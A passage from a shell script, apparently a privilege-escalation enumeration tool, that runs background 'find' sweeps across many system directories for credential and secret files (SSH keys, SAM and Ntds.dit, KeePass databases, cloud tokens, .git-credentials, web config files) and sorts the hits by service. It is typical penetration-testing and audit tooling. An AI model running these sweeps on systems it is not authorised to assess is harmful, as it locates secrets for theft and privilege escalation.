-o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYS=`eval_bckgrd "find /sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEM=`eval_bckgrd "find /system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_SYSTEMD=`eval_bckgrd "find /systemd -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_TMP=`eval_bckgrd "find /tmp -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_USR=`eval_bckgrd "find /usr -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_VAR=`eval_bckgrd "find /var -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - - - wait # Always wait at the end - CONT_THREADS=0 #Reset the threads counter - - #GENERATE THE STORAGES OF THE FOUND FILES - PSTORAGE_SYSTEMD=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.service$" | sort | uniq | head -n 70) - PSTORAGE_TIMER=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.timer$" | sort | uniq | head -n 70) - PSTORAGE_SOCKET=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/usr|^/lib64|^/opt|^/systemd|^/bin|^/etc|^/lib32|^/private|^/run|^/tmp|^/lib|^/system|^/applications|^/.cache|^/srv|^/snap|^$GREPHOMESEARCH|^/sbin|^/sys|^/var|^/mnt|^/cdrom|^/media" | grep -E ".*\.socket$" | sort | uniq | head -n 70) - PSTORAGE_DBUS=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/etc" | grep -E "system\.d$" | sort | uniq | head -n 70) - PSTORAGE_MYSQL=$(echo -e "$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -v -E 'mysql/mysql' | grep -E '^/etc/.*mysql|/usr/var/lib/.*mysql|/var/lib/.*mysql' | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mysql$" | sort | uniq | head -n 70) - PSTORAGE_MARIADB=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "mariadb\.cnf$|debian\.cnf$" | sort | uniq | head -n 70) - PSTORAGE_POSTGRESQL=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "pgadmin.*\.db$|pg_hba\.conf$|postgresql\.conf$|pgsql\.conf$" | sort | uniq | head -n 70) - PSTORAGE_APACHE=$(echo -e "$FIND_CACHE\n$FIND_HOMESEARCH\n$FIND_SYS\n$FIND_MEDIA\n$FIND_LIB32\n$FIND_TMP\n$FIND_APPLICATIONS\n$FIND_RUN\n$FIND_VAR\n$FIND_SRV\n$FIND_OPT\n$FIND_ETC\n$FIND_SNAP\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_MNT\n$FIND_PRIVATE\n$FIND_USR\n$FIND_SBIN\n$FIND_CDROM\n$FIND_LIB64\n$FIND_LIB\n$FIND_SYSTEM\n$FIND_DIR_MEDIA\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_ETC\n$FIND_DIR_MNT\n$FIND_DIR_PRIVATE\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_TMP\n$FIND_DIR_VAR\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SNAP\n$FIND_DIR_OPT\n$FIND_DIR_SRV" | grep -E "^/tmp|^/sbin|^/usr|^/var|^/bin|^/applications|^/.cache|^/etc|^/srv|^/private|^/snap|^/mnt|^/cdrom|^/media|^/opt|^$GREPHOMESEARCH" | grep -E "sites-enabled$|000-default\.conf$|php\.ini$" | sort | uniq | head -n 70) - PSTORAGE_PHP_SESSIONS=$(echo -e 